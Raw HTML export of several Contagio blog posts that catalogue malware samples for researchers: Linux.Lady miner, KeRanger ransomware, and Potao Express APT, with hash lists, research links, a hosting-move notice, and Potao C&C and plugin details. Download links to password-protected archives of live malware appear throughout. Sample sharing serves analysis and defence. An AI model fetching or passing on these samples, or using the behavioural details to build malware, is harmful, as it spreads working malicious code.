<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgfkoTnQCrO-5HwTMOJnTCpFEZoqWRWbFUhyvN1P5-31CO94qqAuOtFts6n2Zj9_KqB2rHF4ZQr7PS35_0c5icC7AHOXDOIhwvVY9WK4J2pVU-mPLNYtv8109YZU3QJuuaTK9jZnxPwDU/s1600/screenshot-676.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="102" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgfkoTnQCrO-5HwTMOJnTCpFEZoqWRWbFUhyvN1P5-31CO94qqAuOtFts6n2Zj9_KqB2rHF4ZQr7PS35_0c5icC7AHOXDOIhwvVY9WK4J2pVU-mPLNYtv8109YZU3QJuuaTK9jZnxPwDU/s320/screenshot-676.png" width="320" /></a><br />
<b>Research: SentinelOne, Tim Strazzere <a href="https://sentinelone.com/blogs/hiding-plain-sight/" target="_blank">Hiding in plain sight?</a></b><br />
Sample credit: Tim Strazzere<br />
<br />
<br />
List of files<br />
<br />
9f7ead4a7e9412225be540c30e04bf98dbd69f62b8910877f0f33057ca153b65 malware<br />
d507119f6684c2d978129542f632346774fa2e96cf76fa77f377d130463e9c2c malware<br />
fddb36800fbd0a9c9bfffb22ce7eacbccecd1c26b0d3fb3560da5e9ed97ec14c script.decompiled-pretty<br />
ec5d4f90c91273b3794814be6b6257523d5300c28a492093e4fa1743291858dc script.decompiled-raw<br />
4d46893167464852455fce9829d4f9fcf3cce171c6f1a9c70ee133f225444d37 script.dumped<br />
<br />
malware_a3dad000efa7d14c236c8018ad110144<br />
malware fcbfb234b912c84e052a4a393c516c78<br />
script.decompiled-pretty aab8ea012eafddabcdeee115ecc0e9b5<br />
script.decompiled-raw ae0ea319de60dae6d3e0e58265e0cfcc<br />
script.dumped b30df2e63bd4f35a32f9ea9b23a6f9e7<br />
<br />
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 14px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6px; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
</div>
<br />
<div style="-webkit-text-stroke-width: 0px; background-color: #618f2b; color: white; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 14px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: normal; letter-spacing: normal; line-height: 19px; orphans: 2; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: "courier new" , "courier" , monospace;"><b>Download</b></span></div>
<a href="https://www.dropbox.com/s/htzh42yrze5045m/pakfil.zip?dl=0" target="_blank"><br class="Apple-interchange-newline" /><br class="Apple-interchange-newline" /><img border="0" data-pin-nopin="true" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background: rgb(255, 255, 255); border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; color: #274e13; font-family: "Courier New", Courier, monospace; font-size: 14px; line-height: 19.6px; padding: 0px; position: relative;" />Download. Email me if you need the password</a><br />
<div>
<br /></div>
</div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com2tag:blogger.com,1999:blog-7885177434994542510.post-7156983710769119122016-08-17T00:06:00.002-04:002016-08-17T00:06:52.218-04:00"i am lady" Linux.Lady trojan samples<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
Bitcoin mining malware for Linux servers - samples<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHUoCPpfbeUaLJfgwHE178SFiq-kAKWMLomDwYx1SD6bjdTMxPj7xRJMR9qMTYlqsrOFvQxPfcTt366HSmXjrFxFvLYQRFCSMwWKV_US1xs3iijeSBpegYTZC18zE__F3wIFVf-Gxjq78/s1600/screenshot-640.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHUoCPpfbeUaLJfgwHE178SFiq-kAKWMLomDwYx1SD6bjdTMxPj7xRJMR9qMTYlqsrOFvQxPfcTt366HSmXjrFxFvLYQRFCSMwWKV_US1xs3iijeSBpegYTZC18zE__F3wIFVf-Gxjq78/s400/screenshot-640.png" /></a>Research: <a href="http://vms.drweb.com/virus/?_is=1&i=8400823" target="_blank">Dr. Web. Linux.Lady</a><br />
<br />
Sample Credit: Tim Strazzere<br />
<br />
MD5 list:<br />
<br />
0DE8BCA756744F7F2BDB732E3267C3F4<br />
55952F4F41A184503C467141B6171BA7<br />
86AC68E5B09D1C4B157193BB6CB34007<br />
E2CACA9626ED93C3D137FDF494FDAE7C<br />
E9423E072AD5A31A80A31FC1F525D614<br />
<br />
<br />
<br />
<a href="https://www.dropbox.com/s/e6sd6kya8wht48u/linux-lady.zip?dl=0" target="_blank">Download. Email me if you need the password.</a></div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com0tag:blogger.com,1999:blog-7885177434994542510.post-89398624770016229152016-03-06T18:39:00.002-05:002016-03-06T18:39:42.327-05:00Ransomware.OSX.KeRanger samples<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTqU6CVQJ3JgXN4UGdrHU7syvd0sqpM0cMjLANonqMeGvCAmJNZdVXQ0LLlyI_L3wmsYtq1OCUcgD-HMCidtfR0xbxBuzHQWmT_lN7iV8UVXu4iEINPKk1yinSyOjw2D3qgzU6zAail-E/s1600/fig1-500x284.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTqU6CVQJ3JgXN4UGdrHU7syvd0sqpM0cMjLANonqMeGvCAmJNZdVXQ0LLlyI_L3wmsYtq1OCUcgD-HMCidtfR0xbxBuzHQWmT_lN7iV8UVXu4iEINPKk1yinSyOjw2D3qgzU6zAail-E/s200/fig1-500x284.png" width="200" /></a><br />
Research: <a href="http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/">New OS X Ransomware KeRanger Infected Transmission BitTorrent Client Installer by Claud Xiao</a><br />
<br />
Sample credit: Claud Xiao<br />
<br />
<br />
<div style="background-color: #618f2b; color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px; text-align: center;">
<span style="font-family: 'Courier New', Courier, monospace;"><b>File information</b></span></div>
<div style="font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6px;">
<div style="line-height: 19px;">
<br /></div>
</div>
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">d1ac55a4e610380f0ab239fcc1c5f5a42722e8ee1554cba8074bbae4a5f6dbe1 </span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">1d6297e2427f1d00a5b355d6d50809cb </span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">Transmission-2.90.dmg</span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;"><br /></span></span>
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">e3ad733cea9eba29e86610050c1a15592e6c77820927b9edeb77310975393574 </span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">56b1d956112b0b7bd3e44f20cf1f2c19 </span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">Transmission</span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;"><br /></span></span>
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">31b6adb633cff2a0f34cefd2a218097f3a9a8176c9363cc70fe41fe02af810b9</span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">14a4df1df622562b3bf5bc9a94e6a783 </span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">General.rtf</span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;"><br /></span></span>
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">d7d765b1ddd235a57a2d13bd065f293a7469594c7e13ea7700e55501206a09b5 </span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">24a8f01cfdc4228b4fc9bb87fedf6eb7 </span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">Transmission2.90.dmg</span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;"><br /></span></span>
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">ddc3dbee2a8ea9d8ed93f0843400653a89350612f2914868485476a847c6484a</span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">3151d9a085d14508fa9f10d48afc7016 </span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">Transmission</span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;"><br /></span></span>
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">6061a554f5997a43c91f49f8aaf40c80a3f547fc6187bee57cd5573641fcf153 </span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">861c3da2bbce6c09eda2709c8994f34c </span></span><br />
<span style="color: #333333; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="font-size: 13px; line-height: 20px;">General.rtf</span></span><br />
<div>
<br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<div style="background-color: #618f2b; color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19px; text-align: center;">
<span style="font-family: 'Courier New', Courier, monospace;"><b>Download</b></span></div>
<div style="font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6px;">
<div style="line-height: 19px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" imageanchor="1" style="clear: left; color: #660000; float: left; line-height: 19.6px; margin-bottom: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background: rgb(255, 255, 255); border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; font-family: 'Courier New', Courier, monospace; padding: 0px; position: relative;" /></a><div style="line-height: 19px;">
<a href="https://www.dropbox.com/s/1sxr4j3x84ohbt2/Ransomware.OSX.KeRanger_samples.zip?dl=0"><br /></a></div>
<a href="https://www.dropbox.com/s/1sxr4j3x84ohbt2/Ransomware.OSX.KeRanger_samples.zip?dl=0">Download. Email me if you need the password (New link)</a></div>
<div style="line-height: 19px;">
<br /></div>
<div style="line-height: 19px;">
<br /></div>
</div>
</div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com1tag:blogger.com,1999:blog-7885177434994542510.post-4405756135330614972016-02-23T15:48:00.003-05:002016-02-25T00:18:39.617-05:00Files download information <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPfBolZwTZSg1RlXeo27jfhEzIXmYbHtb3D9yHeR-nSlDcVA0BSeIZIDGZhGLqjC4CIr-Z9ttzLJn6p0FGd3EqthUhYbfAgOMeg5bEZyOlTAQJiA3r2Nn-y-rbeRtGlwWLC1VeJsmEnic/s1600/road-closed-detour-sign-without-local-traffic-stuff-broke-fix-it-later-copy.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPfBolZwTZSg1RlXeo27jfhEzIXmYbHtb3D9yHeR-nSlDcVA0BSeIZIDGZhGLqjC4CIr-Z9ttzLJn6p0FGd3EqthUhYbfAgOMeg5bEZyOlTAQJiA3r2Nn-y-rbeRtGlwWLC1VeJsmEnic/s200/road-closed-detour-sign-without-local-traffic-stuff-broke-fix-it-later-copy.jpg" width="198" /></a></div>
<span style="background-color: white; color: black; display: inline; float: none; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">After 7 years of Contagio existence, Google Safe Browsing services notified Mediafire (hoster of Contagio and Contagiominidump files) that "harmful" content is hosted on my Mediafire account.</span><br />
<br style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;" />
<span style="background-color: white; color: black; display: inline; float: none; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">It is harmful only if you harm your own pc and but not suitable for distribution or infecting unsuspecting users but I have not been able to resolve this with Google and Mediafire.</span><br />
<br style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;" />
<span style="background-color: white; color: black; display: inline; float: none; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">Mediafire suspended public access to Contagio account.</span><br />
<br style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;" />
<span style="background-color: white; color: black; display: inline; float: none; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">The file hosting will be moved.</span><br />
<br style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;" />
<b style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: 19.6px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;">If you need any files now, email me the posted Mediafire links (address in profile) and I will pull out the files and share via other methods.</b><br />
<br style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;" />
<span style="background-color: white; color: black; display: inline; float: none; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">P.S. I have not been able to resolve "yet" because it just happened today, not because they refuse to help. I don't want to affect Mediafire safety reputation and most likely will have to move out this time.</span><br />
<br style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;" />
<span style="background-color: white; color: black; display: inline; float: none; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">The main challenge is not to find hosting, it is not difficult and I can pay for it, but the effort move all files and fix the existing links on the Blogpost, and there are many. I planned to move out long time ago but did not have time for it. If anyone can suggest how to change all Blogspot links in bulk, I will be happy.</span><br />
<span style="background-color: white; color: black; display: inline; float: none; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;"><br /></span>
<span style="color: blue;"><br class="Apple-interchange-newline" />P.P.S. Feb. 24 - The files will be moved to a Dropbox Business account and shared from there (Dropbox team confirmed they can host it ) </span><br />
<span style="background-color: white; color: black; display: inline; float: none; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 14px; line-height: 19.6px;"></span><br />
<span style="color: blue;">The transition will take some time, so email me links to what you need. </span><br />
<span style="color: blue;"><br /></span>
<span style="background-color: white; color: black; display: inline; float: none; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">Thank you all</span><br />
<span style="background-color: white; color: black; display: inline; float: none; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 19.6px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">M</span></div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com3tag:blogger.com,1999:blog-7885177434994542510.post-81474536011122858242015-08-12T08:24:00.001-04:002015-08-12T08:25:28.224-04:00Potao Express samples<div dir="ltr" style="text-align: left;" trbidi="on">
<b><a href="http://www.welivesecurity.com/2015/07/30/operation-potao-express/"><span style="font-family: inherit;">http://www.welivesecurity.com/2015/07/30/operation-potao-express/</span></a></b><br />
<span style="font-family: inherit;"><br /></span>
<b><a href="http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf"><span style="font-family: inherit;">http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf</span></a></b><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.welivesecurity.com/wp-content/uploads/2015/07/1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="http://www.welivesecurity.com/wp-content/uploads/2015/07/1.jpg" height="215" width="320" /></span></a></div>
<span style="font-family: inherit;"><b>TL; DR</b></span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div>
<span style="font-family: inherit;">2011- July 2015</span></div>
<div>
</div>
<ul>
<li><span style="font-family: inherit;">Aka Sapotao and node69</span></li>
<li><span style="font-family: inherit;">Group - Sandworm / Quedagh APT</span></li>
<li><span style="font-family: inherit;">Vectors - USB, exe as doc, xls</span></li>
<li><span style="font-family: inherit;">Victims - RU, BY, AM, GE </span></li>
<li><span style="font-family: inherit;">Victims - MMM group, UA gov</span></li>
<li><span style="font-family: inherit;">truecryptrussia.ru has been serving modified versions of the encryption software (Win32/FakeTC) that included a backdoor to selected targets. </span></li>
<li><span style="font-family: inherit;">Win32/FakeTC - data theft from encrypted drives</span></li>
<li><span style="font-family: inherit;">The Potao main DLL only takes care of its core functionality; the actual spying functions are implemented in the form of downloadable modules. The plugins are downloaded each time the malware starts, since they aren’t stored on the hard drive.</span></li>
</ul>
<blockquote class="tr_bq">
<ul>
<li><span style="font-family: inherit;">1st Full Plugin and its export function is called Plug. Full plugins run continuously until the infected system is restarted</span></li>
</ul>
<ul>
<li><span style="font-family: inherit;">2nd Light Plugin with an export function Scan. Light plugins terminate immediately after returning a buffer with the information they harvested off the victim’s machine.</span></li>
</ul>
</blockquote>
<ul>
<li><span style="font-family: inherit;">Some of the plugins were signed with a certificate issued to “Grandtorg”:</span></li>
<li><span style="font-family: inherit;">Traffic </span></li>
</ul>
<blockquote class="tr_bq">
<ul>
<li><span style="font-family: inherit;">Strong encryption. The data sent is encapsulated using the XML-RPC protocol.</span></li>
</ul>
<ul>
<li><span style="font-family: inherit;">MethodName value 10a7d030-1a61-11e3-beea-001c42e2a08b is always present in Potao traffic.</span></li>
</ul>
<ul>
<li><span style="font-family: inherit;">After receiving the request the C&C server generates an RSA-2048 public key and signs this generated key with another, static RSA-2048 private key .</span></li>
</ul>
<ul>
<li><span style="font-family: inherit;">In 2nd stage the malware generates a symmetric AES-256 key. This AES session key is encrypted with the newly received RSA-2048 public key and sent to the C&C server.</span></li>
</ul>
<ul>
<li><span style="font-family: inherit;">The actual data exchange after the key exchange is then encrypted using symmetric cryptography, which is faster, with the AES-256 key</span></li>
</ul>
<ul>
<li><span style="font-family: inherit;">The Potao malware sends an encrypted request to the server with computer ID, campaign ID, OS version, version of malware, computer name, current privileges, OS architecture (64 or 32bits) and also the name of the current process.</span></li>
</ul>
</blockquote>
<ul>
<li><span style="font-family: inherit;">Potao USB - uses social engineering, exe in the root disguised as drive icon</span></li>
<li><span style="font-family: inherit;">Potao Anti RE - uses the MurmurHash2 algorithm for computing the hashes of the API function names.</span></li>
<li><span style="font-family: inherit;">Potao Anti RE - encryption of strings</span></li>
<li><span style="font-family: inherit;">Russian TrueCrypt Win32/FakeTC - The malicious program code within the otherwise functional TrueCrypt software runs in its own thread. This thread, created at the end of the Mount function, enumerates files on the mounted encrypted drive, and if certain conditions are met, it connects to the C&C server, ready to execute commands from the attackers.</span></li>
<li><span style="font-family: inherit;">IOC<a href="https://www.blogger.com/goog_271167436"> </a></span><a href="https://github.com/eset/malware-ioc/tree/master/potao">https://github.com/eset/malware-ioc/tree/master/potao<a name='more'></a></a></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkGqrOl8ft8MOteYG3cBwatwXJIQ9fB3x7DQVPCMwJcMWNAk2Iz59iPIGwx7No-QWifrlXDJQPijwiqgLqnBtDLdgI4ASjd_249_EPz2T6bsfAIDreka1_Bm4NTARE78dGvC9DoBNK0Dk/s640/comparisonsandworm.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkGqrOl8ft8MOteYG3cBwatwXJIQ9fB3x7DQVPCMwJcMWNAk2Iz59iPIGwx7No-QWifrlXDJQPijwiqgLqnBtDLdgI4ASjd_249_EPz2T6bsfAIDreka1_Bm4NTARE78dGvC9DoBNK0Dk/s640/comparisonsandworm.PNG" width="505" /></a></div>
<div>
</div>
<div>
<br /></div>
<div>
<div style="background-color: white; font-family: 'Trebuchet MS', Trebuchet, sans-serif; font-size: 14px; line-height: 19.6000003814697px;">
<div style="background-color: #618f2b; color: white; line-height: 19px; text-align: center;">
<span style="font-family: 'Courier New', Courier, monospace;"><b>Download</b></span></div>
<div style="line-height: 19.6000003814697px;">
<div style="line-height: 19px;">
<br />
<b><br /></b></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" imageanchor="1" style="clear: left; color: #660000; margin-bottom: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; font-family: 'Courier New', Courier, monospace; padding: 0px; position: relative;" /></a><a href="http://www.mediafire.com/download/0k71e8tcr2mopwp/Potao_express-samp.zip">Download. Email me if you need the password</a></div>
<div>
</div>
<div>
<div style="line-height: 19.6000003814697px;">
</div>
</div>
</div>
</div>
<div>
<table class="tableizer-table" style="border: 1px solid rgb(204, 204, 204); color: black; font-family: Arial, Helvetica, sans-serif; font-size: 11px;"><tbody>
<tr class="tableizer-firstrow"><th style="background-color: #6d6d6e; color: white;">Type</th><th style="background-color: #6d6d6e; color: white;">SHA256</th><th style="background-color: #6d6d6e; color: white;">MD5</th></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1stVersion</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1fe6af3d704d2fc0c7acd58b069a31eec866668ec6e25f52354e6e61266db8db</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">85b0e3264820008a30f17ca19332fa19</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1stVersion</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2ff0941fe3514abc12484ad2853d22fd7cb36469a313b5ecb6ef0c6391cf78ab</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ac854a3c91d52bfc09605506e76975ae</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1stVersion</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">54a76f5cd5a32ed7d5fa78e5d8311bafc0de57a475bc2fddc23ee4b3510b9d44</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3b7d88a069631111d5585b1b10cccc86</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1stVersion</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">76c7c67274cf5384615a120e69be3af64cc31d9c4f05ff2031120612443c8360</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d1658b792dd1569abc27966083f59d44</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1stVersion</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">244c181eb442fefcf1e1daf900896bee6569481c0e885e3c63efeef86cd64c55</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0c7183d761f15772b7e9c788be601d29</td></tr>
